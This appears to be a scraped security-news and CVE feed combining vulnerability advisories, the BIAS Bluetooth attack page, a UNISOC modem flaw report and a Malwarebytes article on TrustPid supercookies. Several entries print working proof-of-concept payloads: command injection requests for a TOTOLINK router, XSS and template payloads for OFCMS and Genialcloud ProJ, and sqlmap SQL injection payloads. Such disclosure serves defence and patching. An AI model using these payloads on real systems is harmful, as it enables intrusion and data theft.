TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function setDeviceMac of the file global.so which can control deviceName to attack.

There is a remote command injection in the function setDeviceMac of the file global.so , we can control thedeviceName to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"setting/setDeviceName",
    "deviceMac":"1'\nps>/web_cste/test1\n'",
    "deviceName":"1"}

CVE-2021-42885: vuln/totolink_ex1200t_devicemac_rce.md at main · p1Kk/vuln

TOTOLINK EX1200T V4.1.2cu.5215 contains a remote command injection vulnerability in function setDeviceName of the file global.so which can control thedeviceName to attack.

There is a remote command injection in the function setDeviceName of the file global.so , we can control thedeviceName to attack.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    If-Modified-Since: Thu, 01 Jan 1970 00:00:03 GMT
    Connection: close
    Content-Length: 68
    
    {"topicurl":"setting/setDeviceName",
    "deviceMac":"1",
    "deviceName":"1'\nps>/web_cste/test1\n'"}

CVE-2021-42884: vuln/totolink_ex1200t_devicename_rce.md at main · p1Kk/vuln

Couchbase Server before 7.1.0 has Incorrect Access Control.

CVE-2021-33504: Alerts | Couchbase

With shadow paging enabled, the INVPCID instruction results in a call to kvm_mmu_invpcid_gva. If INVPCID is executed with CR0.PG=0, the invlpg callback is not set and the result is a NULL pointer dereference.

**BIAS: Bluetooth Impersonation AttackS**

**About the BIAS attack**

TL;DR: The Bluetooth standard provides authentication mechanisms based on a long term pairing key, which are designed to protect against impersonation attacks. The BIAS attacks from our new paper demonstrate that those mechanisms are broken, and that an attacker can exploit them to impersonate any Bluetooth master or slave device. Our attacks are standard-compliant, and can be combined with other attacks, including the KNOB attack. In the paper, we also describe a low cost implementation of the attacks and our evaluation results on 30 unique Bluetooth devices using 28 unique Bluetooth chips.

**Details**

Bluetooth Classic (also called Bluetooth BR/EDR) is a wireless communication protocol commonly used between low power devices to transfer data, e.g., between a wireless headset and a phone, or between two laptops. Bluetooth communications might contain private and/or sensitive data, and the Bluetooth standard provides security features to protect against someone who wants to eavesdrop and/or manipulate your information. We found and exploited a severe vulnerability in the Bluetooth BR/EDR specification that allows an attacker to break the security mechanisms of Bluetooth for any standard-compliant device. As a result, an attacker can impersonate a device towards the host after both have previously been successfully paired in absence of the attacker.

We call our attack Bluetooth Impersonation AttackS (BIAS). Because this attack affects basically all devices that “speak Bluetooth”, we performed a responsible disclosure with the Bluetooth Special Interest Group (Bluetooth SIG) - the standards organisation that oversees the development of Bluetooth standards - in December 2019 to ensure that workarounds could be put in place.

**Are My Devices Vulnerable?**

The BIAS attack is possible due to flaws in the Bluetooth specification. As such, any standard-compliant Bluetooth device can be expected to be vulnerable. We conducted BIAS attacks on more than 28 unique Bluetooth chips (by attacking 30 different devices). At the time of writing, we were able to test chips from Cypress, Qualcomm, Apple, Intel, Samsung and CSR. All devices that we tested were vulnerable to the BIAS attack.

After we disclosed our attack to industry in December 2019, some vendors might have implemented workarounds for the vulnerability on their devices. So the short answer is: if your device was not updated after December 2019, it is likely vulnerable. Devices updated afterwards might be fixed.

**Team**

**Daniele Antonioli****Postdoc at the EPFL**

Cyber-Physical Systems Security, Network Security, Wireless Security, Embedded Systems Security, Applied Cryptography, SoCurity

**Kasper Rasmussen****Faculty**

Security of Wireless Networks, Protocol design, Applied Cryptography, Security of embedded systems, Cyber-physical systems

**Nils Ole Tippenhauer****Faculty**

Security of Cyber-Physical Systems, Security of Physical-Layer Wireless, IoT Security

**Related Publications**

**Recent & Upcoming Talks**

**Media Coverage**

*   social
    
    *   Reddit Thread
*   CERT
    
    *   CVE-2020-10135
    *   https://www.kb.cert.org/vuls/id/647177/
*   Bluetooth SIG
    
    *   2020/05/18 “Bluetooth SIG Statement Regarding the Bluetooth Impersonation Attacks (BIAS) Security Vulnerability” by the Blueooth SIG
*   Selected EN press
    
    *   2020/05/19: MSN, “Smartphones, laptops, IoT devices vulnerable to new BIAS Bluetooth attack” by Catalin Cimpanu
    *   2020/05/21: TimesNowNews, “Smartphones, laptops, IoT devices from Apple, Intel, Samsung vulnerable to new BIAS Bluetooth attack” by Krishna SinhaChaudhury
    *   2020/05/19: SecurityAffairs, “Boffins disclosed a security flaw in Bluetooth, dubbed BIAS, that could potentially be exploited by an attacker to spoof a remotely paired device” by Pierluigi Paganini
    *   2020/05/19: WeLiveSecurity, “Bluetooth flaw exposes countless devices to BIAS attacks” by Amer Owaida
    *   2020/05/19: forklog, “Hackers Can Impersonate Bluetooth Devices to Steal Users’ Personal Data: Is This a Threat to You?" by Ana Alexandre
    *   2020/05/19: The Hacker News, “New Bluetooth Vulnerability Exposes Billions of Devices to Hackers” by Ravie Lakshmanan
    *   2020/05/18: ZDNet, “Smartphones, laptops, IoT devices vulnerable to new BIAS Bluetooth attack” by Catalin Cimpanu
    *   2020/05/19: CISO Mag, “New BIAS Vulnerability Affects All Modern Bluetooth Devices” by CISOMAG
    *   2020/05/18: ThreatsHub, “Smartphones, laptops, IoT devices vulnerable to new BIAS Bluetooth attack” by TH Author
    *   2020/05/18: ROOTDAEMON.com, “Smartphones, laptops, IoT devices vulnerable to new BIAS Bluetooth attack” by ROOTDAEMON
    *   2020/05/19: ITPro, “Bluetooth pairing flaw exposes devices to BIAS attacks” by Keumars Afifi-Sabet
    *   2020/05/19: MyBroadband, “New security flaw affects almost all Bluetooth devices” by Bradley Prior
*   Selected ES press
    
    *   2020/05/19: El Español, “Bluetooth es un peligro: descubren que es posible engañar a tu móvil” by Adrián Raya
*   Selected IT press
    
    *   2020/05/19: PuntoInformatico, “BIAS: nuova vulnerabilità nel Bluetooth” by Giacomo Dotta
*   Selected DE press
    
    *   2020/05/21: Heise.de, “Bluetooth-Sicherheitslücke ermöglicht unerkannte Angriffe”

CVE-2022-1789: BIAS

OFCMS v1.1.4 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/comn/service/update.json.

\[Suggested description\]  
There are many cross-site scripting vulnerabilities in the background of OFCMS system version 1.1.4, because the special characters entered are not effectively escaped.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/oufu/ofcms

\[Affected Product Code Base\]  
v1.1.4

\[Affected Component\]

    POST /ofcms/admin/comn/service/update.json?sqlid=system.role.update HTTP/1.1
    Host: localhost:7000
    Content-Length: 94
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://localhost:7000
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:7000/ofcms/admin/f.html?p=system/role/edit.html&role_id=3&_fsUuid=820e45c9-7f52-4e8d-b917-930c4b13153c
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=A81B589572EF210191B7C30F017A814D
    Connection: close
    
    role_id=3&role_name=%24%7B2*2%7D&role_desc=Test+freemarker+%3Cscript%3Ealert(1)%3C%2Fscript%3E
    

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability to prove\]  
Case 1:  
/ofcms/admin/comn/service/update.json?sqlid=system.menu.update  
  
  

Case 2:  
/ofcms/admin/comn/service/update.json?sqlid=cms.bbs.update  
  
  

Case 3:  
/ofcms/admin/comn/service/update.json?sqlid=cms.ad.update

CVE-2022-29653: There are many cross-site scripting vulnerabilities in ofCMS system background · Issue #I53COA · 欧福/ofcms - Gitee.com

Badminton Center Management System V1.0 is vulnerable to SQL Injection via parameter 'id' in /bcms/admin/court_rentals/update_status.php.

1.  Description:

Badminton Center Management System allows SQL Injection via parameter 'id' in /bcms/admin/court\_rentals/update\_status.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2.  Proof of Concept:

In Burpsuite intercept the request from the affected page with 'customer\_number' parameter and save it like poc.txt Then run SQLmap to extract the data from the database:

sqlmap.py -r poc.txt --dbms=mysql

3.  Example payloads:

Parameter: id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: id=test' AND 7374=(SELECT (CASE WHEN (7374=7374) THEN 7374 ELSE (SELECT 6961 UNION SELECT 8511) END))-- -&status=3
    
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=test' AND EXTRACTVALUE(8482,CONCAT(0x5c,0x71627a6b71,(SELECT (ELT(8482=8482,1))),0x71626a6271))-- ukNa&status=3
    
    Type: time-based blind
    Title: MySQL > 5.0.12 AND time-based blind (heavy query)
    Payload: id=test' AND 9267=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- JYkT&status=3
    
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=test' UNION ALL SELECT CONCAT(0x71627a6b71,0x76455372796b6b59767845715272496c626e7a4b6b5a4c664f48736258654b6359576c52474b5356,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&status=3
    

4.  Burpsuite request:

GET /bcms/admin/court\_rentals/update\_status.php?id=2%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f\*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22\*%2f%20%2f\*%2042ef7f74-0853-4e23-9722-b42223e2b1b9%20\*%2f&status=3 HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,_/_;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: PHPSESSID=0oviirpbcg8rf511ik98trenv1 Referer: http://localhost/bcms/admin/court\_rentals/update\_status.php?id=2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36

CVE-2022-30490: GitHub - yasinyildiz26/Badminton-Center-Management-System

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

A critical security flaw has been uncovered in UNISOC's smartphone chipset that could be potentially weaponized to disrupt a smartphone's radio communications through a malformed packet.
"Left unpatched, a hacker or a military unit can leverage such a vulnerability to neutralize communications in a specific location," Israeli cybersecurity company Check Point said in a report shared with The

A critical security flaw has been uncovered in UNISOC's smartphone chipset that could be potentially weaponized to disrupt a smartphone's radio communications through a malformed packet.

"Left unpatched, a hacker or a military unit can leverage such a vulnerability to neutralize communications in a specific location," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "The vulnerability is in the modem firmware, not in the Android OS itself."

UNISOC, a semiconductor company based in Shanghai, is the world's fourth-largest mobile processor manufacturer after Mediatek, Qualcomm, and Apple, accounting for 10% of all SoC shipments in Q3 2021, according to Counterpoint Research.

The now-patched issue has been assigned the identifier CVE-2022-20210 and is rated 9.4 out of 10 for severity on the CVSS vulnerability scoring system.

In a nutshell, the vulnerability — discovered following a reverse-engineering of UNISOC's LTE protocol stack implementation — relates to a case of buffer overflow vulnerability in the component that handles Non-Access Stratum (NAS) messages in the modem firmware, resulting in denial-of-service.

To mitigate the risk, it's recommended that users update their Android devices to the latest available software as and when it becomes available as part of Google's Android Security Bulletin for June 2022.

"An attacker could have used a radio station to send a malformed packet that would reset the modem, depriving the user of the possibility of communication," Check Point's Slava Makkaveev said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Critical UNISOC Chip Vulnerability Affects Millions of Android Smartphones

German ISPs are working on the introduction of TrustPid. A supercookie that is intended to replace tracking cookies.
The post TrustPid is another worrying, imperfect attempt to replace tracking cookies appeared first on Malwarebytes Labs.

German ISPs are considering the introduction of TrustPid, a new type of “supercookie” that comprises of a unique identifier which will be issued for each customer that will be able to track what that customer is doing online.

The providers are trying to sell this idea by telling the public that the identifier can never be tracked back to an individual and that something needs to be done to keep the internet free.

**The end of the tracking cookie**

Where does this attempt come from, you may ask. Advertisers are seeing the end of the tracking cookie on the horizon and it’s coming closer.

Google has announced that it will stop the use of third-party cookies in Chrome by the end of 2023, joining a growing list of browsers that are saying farewell to the tracking cookies. And Apple already blocks default tracking everywhere.

Social media and tech giants, including Google, are already looking at other business models to replace tracking cookies since they are the ones that benefited the most from targeted advertising, by providing the most useful information to the advertisers.

What makes supercookies different is that they are unique identifiers that are inserted into the HTTP header by a service provider. Unlike normal cookies they do not get stored in browsers or browser plug-ins.

**Free internet**

The idea of a free internet—as communicated by some of these companies—is not that they are signing you up as a customer free of charge. Wouldn’t that be nice? No, the idea is that websites that are providing content need to make a living. And the usual income for most of those sites comes from advertising. Why the ISP providers feel that it is part of their job description to enable targeted advertising escapes me. But undoubtedly the goal is to improve the bottom line.

Targeted advertising is more rewarding than regular advertising since it supposedly enormously enhances the effect of the advertisement. At least, that’s the idea that most advertisers live by, and sell to their customers. But here’s something to consider: According to research by Cloudflare, 20 percent of websites that serve ads receive visits almost exclusively by fraudulent click bots, and that bots comprise roughly 50 percent of all Internet traffic. Imagine how much money advertisers could save by effectively tackling ad fraud. Plus, that sounds a lot better than tagging another tracker on us.

**Hiding consent**

The worst bit of your ISP enabling the tracking is that every user has to sign some sort of agreement with them. In this agreement the ISP can hide the TrustPid consent in a long End-user License Agreement (EULA) that almost no-one ever reads and which can probably not be declined partially. It’s all or nothing if you want or need this provider. And if one provider successfully monetizes this idea, I’m afraid others will quickly follow suite.

Another advantage of an ISP is that they know if and when the IP of your home connection changes and for mobile devices they can even enumerate the users within a household by identifying the individual devices.

**History**

The idea of ISPs issuing supercookies is certainly not new. Verizon was the example that should have served as a history lesson here. In 2016, Verizon had to settle with the FCC over its use of a supercookie, which tracked the websites visited by phones on its network. They were fined because they forgot to inform the customers or give them an opt-out option. Verizon had to pay a fine of $1.35 million and was ordered to receive customer permission before sharing tracking data with other companies or even within its own organization.

**How it works**

The network provider will first combine your mobile number and IP address to generate a pseudonymous network identifier, after which using that identifier they will generate a pseudonymous unique token (TrustPid).

This TrustPid is used to create additional marketing tokens for the websites of advertisers and publishers you visit (website specific tokens). Advertisers and publishers aren’t (shouldn’t be) able to identify you as a person via the website specific tokens.

Where you have given consent, advertisers and publishers will use the website specific tokens to provide you with targeted online marketing, or conduct analytics. The advertisers and publishers that you’ve consented to could be drawn up in a list that will be in the hands of the ISP, but you can manage your consent for those parties at any time via the Privacy Portal.

I inserted the “shouldn’t be” since we are all too aware that many good intentions have unexpected consequences. Let’s suppose that you fill out your details on one of the websites that you decided to trust. Introduce one XSS vulnerability and all your personal details could be linked back to your TrustPid.

**Mitigation**

Because of the lack of technical details provided about TrustPid, we are not completely clear how a user can avoid being tracked. But I asked German privacy expert Andreas Dewes and he responded:

> “a device level VPN with integrated DNS should be able to block this kind of tracking.”

Once we know more, there might be easier and simpler ways to get around this. We’ll keep you posted.

TrustPid is another worrying, imperfect attempt to replace tracking cookies

Avantune Genialcloud ProJ version 10 suffers from a cross site scripting vulnerability.

    # Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)# Date: 2022-06-01# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.avantune.com# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com# Version: 10# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)# CVE: CVE-2022-29296Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from thesame software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to injectand execute arbitrary web scripts or HTML via a crafted payload.Request parameters affected is "msg".PoC Request:GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1Host: [REDACTED]Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US,en-GB;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36Connection: closeCache-Control: max-age=0PoC Response:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Wed, 11 May 2022 10:51:10 GMTConnection: closeContent-Length: 8162<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet"...[SNIP]...<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>...[SNIP]...Timeline:2022-01-05: Vulnerability discovered.2022-01-06: Vendor contacted.2022-02-07: No reply, vendor contacted for 2nd time.2022-02-10: Request for CVE reservation.2022-04-16: Assigned CVE number CVE-2022-29296.2022-05-07: No reply, vendor contacted for 3rd time.2022-06-01: Public disclosure.PoC Screenshots:https://imagebin.ca/v/6j86ekMqKZD8https://postimg.cc/XXv6YbK9

Tag

#apple